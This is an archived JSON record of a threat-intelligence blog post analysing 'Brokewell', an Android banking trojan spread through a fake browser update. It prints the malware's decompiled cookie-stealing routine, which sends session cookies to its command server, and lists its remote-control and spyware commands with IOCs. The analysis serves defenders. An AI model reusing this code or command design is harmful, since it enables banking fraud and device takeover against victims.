{
	"id": "95029ebf-9150-49e1-a758-303f6109e1b0",
	"created_at": "2026-04-06T00:10:56.814069Z",
	"updated_at": "2026-04-10T03:21:38.305589Z",
	"deleted_at": null,
	"sha1_hash": "6c3006c62eebf479b7b4d190698356ad153070ab",
	"title": "Brokewell: do not go broke from new banking malware!",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2065395,
	"plain_text": "Brokewell: do not go broke from new banking malware!\r\nPublished: 2024-10-01 · Archived: 2026-04-05 20:26:32 UTC\r\nIntroduction\r\nConstant monitoring of the threat landscape allows us to spot new threats and actors early and take immediate action—\r\nevaluating the threat and preparing for it.\r\nOur Threat Intelligence shows that device takeover capabilities remain crucial for any modern banking malware family,\r\nand new players entering the landscape are no exception. In most cases, remote access capabilities are built in from the\r\nstart of the development cycle. Thus, it comes as no surprise that ThreatFabric analysts recently discovered a new mobile\r\nmalware family, \"Brokewell,\" with an extensive set of Device Takeover capabilities.\r\nThe analysis of the samples revealed that Brokewell poses a significant threat to the banking industry, providing attackers\r\nwith remote access to all assets available through mobile banking. The Trojan appears to be in active development, with\r\nnew commands added almost daily.\r\nDuring our research, we discovered another dropper that bypasses Android 13+ restrictions. This dropper was developed\r\nby the same actor(s) and has been made publicly available, potentially impacting the threat landscape.\r\nIn this blog, we discuss Brokewell’s primary features that pose significant risks to financial institutions' customers and\r\nidentify a new actor emerging in the mobile banking malware field.\r\nDiscovery - Browser Update?\r\nOur analysts discovered a fake browser update page designed to install an Android application. At first glance, there was\r\nnothing unusual—posing as a browser update is a common method used by cybercriminals to lure victims into\r\ndownloading and installing malware. This approach seems innocent (with a carefully crafted page promoting an update\r\nfor a newer version of the software) and natural (as it occurs during normal browser use) to unsuspecting victims.\r\nhttps://www.threatfabric.com/blogs/brokewell-do-not-go-broke-by-new-banking-malware\r\nPage 1 of 13\n\nHowever, our analysis revealed that the downloaded application is a previously unseen malware family with a wide range\r\nof capabilities. Moreover, a retrospective analysis showed prior campaigns by this malware family targeting a popular\r\n\"buy now, pay later\" financial service and an Austrian digital authentication application.\r\nBrokewell - Well, Now You are Broke\r\nBrokewell is a typical modern banking malware equipped with both data-stealing and remote-control capabilities built\r\ninto the malware.\r\nhttps://www.threatfabric.com/blogs/brokewell-do-not-go-broke-by-new-banking-malware\r\nPage 2 of 13\n\nStealing data: Monitoring Everything\r\nBrokewell uses overlay attacks, a common technique for Android banking malware, where it overlays a bogus screen on\r\na targeted application to capture user credentials. Additionally, Brokewell can steal cookies, another feature common in\r\nmodern mobile banking malware. It does this by launching its own WebView, overriding the onPageFinished method,\r\nand loading the legitimate website. Once the victim completes the login process, Brokewell dumps the session cookies\r\nand sends them to the command and control (C2) server.\r\npublic final void onPageFinished(WebView webView0, String s) {\r\n new Thread(new Runnable() {\r\n @Override\r\n public final void run() {\r\n try {\r\n JSONObject dataToSend = new JSONObject();\r\n try {\r\n dataToSend.put(\"routing\", \"/webv/dump-cookies\");\r\n dataToSend.put(\"apk_id\", com.brkwl.upstracking.WebvInject.f.this.a);\r\n dataToSend.put(\"mycks\", CookieManager.getInstance().getCookie(s));\r\n dataToSend.put(\"myurl\", s);\r\n }\r\n catch (JSONException jSONException0) {\r\n jSONException0.printStackTrace();\r\n }\r\n AccSrvc.encryptAndSendData(dataToSend.toString());\r\n }\r\n catch (Exception exception0) {\r\n exception0.printStackTrace();\r\n }\r\n }\r\n }).start();\r\n}\r\nMoreover, Brokewell is equipped with \"accessibility logging,\" capturing every event happening on the device: touches,\r\nswipes, information displayed, text input, and applications opened. All actions are logged and sent to the command-and-control server, effectively stealing any confidential data displayed or entered on the compromised device.\r\nIt's important to highlight that, in this case, any application is at risk of data compromise: Brokewell logs every event,\r\nposing a threat to all applications installed on the device.\r\nhttps://www.threatfabric.com/blogs/brokewell-do-not-go-broke-by-new-banking-malware\r\nPage 3 of 13\n\nThis piece of malware also supports a variety of \"spyware\" functionalities: it can collect information about the device,\r\ncall history, geolocation, and record audio.\r\nDevice Takeover via Remote Control Capabilities\r\nAfter stealing the credentials, the actors can initiate a Device Takeover attack using remote control capabilities. To\r\nachieve this, the malware performs screen streaming and provides the actor with a range of actions that can be executed\r\non the controlled device, such as touches, swipes, and clicks on specified elements.\r\nBelow is the set of commands available for remote control:\r\nCommands Description\r\ndoClickElem Performs a click on the specified element on the screen\r\ndoClickXY Performs a click at the specified coordinates on the screen\r\ndoDrawXY Draws a line between the specified coordinates\r\nDoGlobalActionBack Simulates “BACK” button click\r\nDoGlobalActionHome Simulates “HOME” button click\r\nhttps://www.threatfabric.com/blogs/brokewell-do-not-go-broke-by-new-banking-malware\r\nPage 4 of 13\n\nDoGlobalActionRecents Simulates “RECENTS” button click\r\ndoScrollElem Performs a scroll in the specified element\r\ndoStartProjection Starts screen streaming\r\ndoStopProjection Stops screen streaming\r\nDoSwipeBottom Performs a swipe down\r\nDoSwipeLeft Performs a swipe left\r\nDoSwipeRight Performs a swipe right\r\nDoSwipeUp Performs a swipe up\r\ndoSwipeXY Performs a swipe between the specified coordinates\r\ndoTypingElem Inputs specified text in specified text field\r\ndoWakeScreen Wakes up the screen\r\nsimulateVIBRATE Simulates vibration\r\nzeroBRIGHTNESS Sets brightness to 0\r\nzeroVOLUME Sets volume to 0\r\nAs can be seen from the commands, the actors have full control over the infected device, allowing them to perform\r\nactions on the victim's behalf. These capabilities might be further expanded in the future by automating specific actions\r\nto streamline the Device Takeover attack for the actors and potentially create a functional Automated Transfer System\r\n(ATS).\r\nhttps://www.threatfabric.com/blogs/brokewell-do-not-go-broke-by-new-banking-malware\r\nPage 5 of 13\n\nThe full list of the commands supported by Brokewell is available in the Appendix.\r\nNew Actor in Mobile Malware Field\r\nAs part of our usual investigation, we sought additional threat intelligence to help identify the actor behind the threat.\r\nThis often requires considerable effort and doesn't always yield results.\r\nHowever, some actors don't try to conceal their identity: one of the servers used as a command and control (C2) point for\r\nBrokewell was also used to host a repository called \"Brokewell Cyber Labs,\" created by \"Baron Samedit.\"\r\nThis repository contains the source code for the \"Brokewell Android Loader,\" another tool from the same developer\r\ndesigned to bypass Android 13+ restrictions on Accessibility Service for side-loaded applications. More details on these\r\nrestrictions and other droppers discovered by ThreatFabric are available in one of our recent blogs.\r\nWe believe this will have a significant impact on the threat landscape. First, more actors will gain the capability to bypass\r\nAndroid 13+ restrictions, suggesting this could become a regular feature for most mobile malware families, similar to\r\nreading SMS messages.\r\nSecond, existing \"Dropper-as-a-Service\" offerings that currently provide this capability as a distinctive feature will likely\r\neither close their services or attempt to re-organize. This further lowers the entry barrier for cybercriminals looking to\r\ndistribute mobile malware on modern devices, making it easier for more actors to enter the field.\r\nFurther analysis of the \"Baron Samedit\" profile reveals that they've been active for at least two years. However, the actor\r\nhad previously provided tools to other cybercriminals to check stolen accounts from multiple services. With the\r\nintroduction of the \"Brokewell Android Loader\" and its public availability, \"Baron Samedit\" has shifted to mobile\r\nmalware, demonstrating the increasing interest of cybercriminals in this area.\r\nFinally, many cybercriminals are trying to \"professionalize\" their illegal activities by creating landing pages for their\r\n\"products,\" as seen in the case of the \"Hadoken Security Group\".\r\nhttps://www.threatfabric.com/blogs/brokewell-do-not-go-broke-by-new-banking-malware\r\nPage 6 of 13\n\nBelow, you can see a screenshot of the landing page for \"Brokewell Cyber Labs,\" where the actor advertises their\r\nproducts, including mobile threats and other offerings.\r\nConclusion\r\nThe discovery of a new malware family, Brokewell, which implements Device Takeover capabilities from scratch,\r\nhighlights the ongoing demand for such capabilities among cyber criminals. These actors require this functionality to\r\ncommit fraud directly on victims' devices, creating a significant challenge for fraud detection tools that heavily rely on\r\ndevice identification or device fingerprinting.\r\nWe anticipate further evolution of this malware family, as we've already observed almost daily updates to the malware.\r\nBrokewell will likely be promoted on underground channels as a rental service, attracting the interest of other\r\ncybercriminals and sparking new campaigns targeting different regions.\r\nMalware families like Brokewell pose a significant risk for customers of financial institutions, leading to successful fraud\r\ncases that are hard to detect without proper fraud detection measures.\r\nWe believe that only a comprehensive, multi-layered fraud detection solution—based on a combination of indicators,\r\nincluding device, behavior, and identity risks for each customer—can effectively identify and prevent potential fraud\r\nfrom malware families like the newly discovered Brokewell.\r\nStay vigilant, stay informed, and stay ahead with ThreatFabric.\r\nAppendix\r\nIOCs\r\nhttps://www.threatfabric.com/blogs/brokewell-do-not-go-broke-by-new-banking-malware\r\nPage 7 of 13\n\nApp\r\nname\r\nPackage name SHA256\r\nGοοgΙe\r\nChrοme\r\njcwAz.EpLIq.vcAZiUGZpK d807070973bde0d85f260950dc764e46a0ba486f62da3e62f3b229ca3ea322f1\r\nID\r\nAustria\r\nzRFxj.ieubP.lWZzwlluca 00d35cf5af2431179b24002b3a4c7fb115380ebda496d78849bf3d10055d8a88\r\nSupported Commands\r\nCommands Description\r\ndoClickElem Performs a click on the specified element on the screen\r\ndoClickXY Performs a click at the specified coordinates on the screen\r\ndoDrawXY Draws a line between the specified coordinates\r\nDoGlobalActionBack Simulates “BACK” button click\r\nDoGlobalActionHome Simulates “HOME” button click\r\nDoGlobalActionRecents Simulates “RECENTS” button click\r\ndoScrollElem Performs a scroll in the specified element\r\ndoStartProjection Starts screen streaming\r\ndoStopProjection Stops screen streaming\r\nDoSwipeBottom Performs a swipe down\r\nhttps://www.threatfabric.com/blogs/brokewell-do-not-go-broke-by-new-banking-malware\r\nPage 8 of 13\n\nDoSwipeLeft Performs a swipe left\r\nDoSwipeRight Performs a swipe right\r\nDoSwipeUp Performs a swipe up\r\ndoSwipeXY Performs a swipe between the specified coordinates\r\ndoTypingElem Inputs specified text in specified text field\r\ndoWakeScreen Wakes up the screen\r\nsimulateVIBRATE Simulates vibration\r\nzeroBRIGHTNESS Sets brightness to 0\r\nzeroVOLUME Sets volume to 0\r\nAcsDumpCurrentNode Collect data from current Accessibility Node\r\nClearInjectList Clear targets configuration\r\nDoGlobalActionDpadCenter Triggers center key event directional pad\r\nDoGlobalActionDpadDown Triggers down key event directional pad\r\nDoGlobalActionDpadLeft Triggers left key event directional pad\r\nDoGlobalActionDpadRight Triggers right key event directional pad\r\nhttps://www.threatfabric.com/blogs/brokewell-do-not-go-broke-by-new-banking-malware\r\nPage 9 of 13\n\nDoGlobalActionDpadUp Triggers up key event directional pad\r\nDoGlobalActionLockScreen Locks the screen\r\nDoGlobalActionNotifications Opens notifications\r\nDoGlobalActionPWRdialog Opens power dialog\r\nDoGlobalActionSplitScreen Opens split screen\r\nDoGlobalActionTakeScreenshot Performs screenshot via global action\r\nDumpTelephonyInfo\r\nCollects information about SIM cards: phone number, operator name, number of\r\nSIM cards\r\naskLOCKPIN Opens fake screen requesting PIN code\r\naskPERMIT Requests necessary permissions\r\ncheckIPexit Retrieves IP address via external service\r\ncheckPERMIT Checks status of requested permissions\r\ndoActivateAdminPermit Requests activation of Device Admin\r\ndoCheckKeyguardState Checks status of keyguard\r\ndoCustomShowOVLAY Opens window with specified text\r\ndoDisabAggressiveReconnect Increases timeout before next connect\r\nhttps://www.threatfabric.com/blogs/brokewell-do-not-go-broke-by-new-banking-malware\r\nPage 10 of 13\n\ndoEnabAggressiveReconnect Decreases timeout before next connect\r\ndoEnableUnknownSourceInstall Opens unknown app sources setting\r\ndoFlipANTI_UNINSTALL Changes self-defence setting to opposite (enables/disables)\r\ndoGetCallHistory Collects call history\r\ndoGetGeoloc Collects geolocation\r\ndoGetPKGINFO Gets details of the malicious package\r\ndoGetRAMconsumed Collects details about memory consumption\r\ndoHideFKLCRIcon Hides other components (currently empty)\r\ndoHideIcon Hides application icon\r\ndoINIT Collects extensive data about the device hardware\r\ndoInstallPKG Downloads and installs application\r\ndoOpenNotifSettings Opens app notification settings\r\ndoPINAutoUnlockScreen Automatically unlocks device with provided PIN\r\ndoPING Sends “PONGGGGxxxx” response\r\ndoPhoneCall Performs phone call\r\nhttps://www.threatfabric.com/blogs/brokewell-do-not-go-broke-by-new-banking-malware\r\nPage 11 of 13\n\ndoRecordAudio Starts audio recording for specified duration\r\ndoScreenshot Takes screenshot with the help of Accessibility Service\r\ndoSelfDestroy Uninstalls malware\r\ndoSelfUpdateAPK Downloads and installs application with the same package name\r\ndoSendSMS Sends SMS message\r\ndoSetAggressiveACSMASK Sets malware to monitor all Accessibility events (“TYPE_ALL_MASK”)\r\ndoSetAssertiveACSMASK Set malware to monitor only “TYPE_WINDOW_STATE_CHANGED” events\r\ndoStopAcsSrvc Disables Accessibility Service\r\ndoUnHideFKLCRIcon Enables other components (currently empty)\r\ndoUnHideIcon Enables icon of the application\r\ndoUninstallPKG Uninstalls specified package\r\ngetBattery Gets battery status\r\ngetInstalledPackages Collects installed applications\r\nopenCertainAPK Opens specified application\r\nopenDeveloperOptions Opens development settings if enabled\r\nhttps://www.threatfabric.com/blogs/brokewell-do-not-go-broke-by-new-banking-malware\r\nPage 12 of 13\n\nopenWebvInject Opens WebView with specified URL\r\nrunSHELL Executes shell command\r\nsetC2addr Updates C2 server address\r\nsetInjectList Sets targets configuration\r\nshowNotif Shows notification\r\nshowOVLAY Shows window with text “Android is updating... Please dont turn off device.”\r\nSource: https://www.threatfabric.com/blogs/brokewell-do-not-go-broke-by-new-banking-malware\r\nhttps://www.threatfabric.com/blogs/brokewell-do-not-go-broke-by-new-banking-malware\r\nPage 13 of 13",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://www.threatfabric.com/blogs/brokewell-do-not-go-broke-by-new-banking-malware"
	],
	"report_names": [
		"brokewell-do-not-go-broke-by-new-banking-malware"
	],
	"threat_actors": [],
	"ts_created_at": 1775434256,
	"ts_updated_at": 1775791298,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6c3006c62eebf479b7b4d190698356ad153070ab.pdf",
		"text": "https://archive.orkl.eu/6c3006c62eebf479b7b4d190698356ad153070ab.txt",
		"img": "https://archive.orkl.eu/6c3006c62eebf479b7b4d190698356ad153070ab.jpg"
	}
}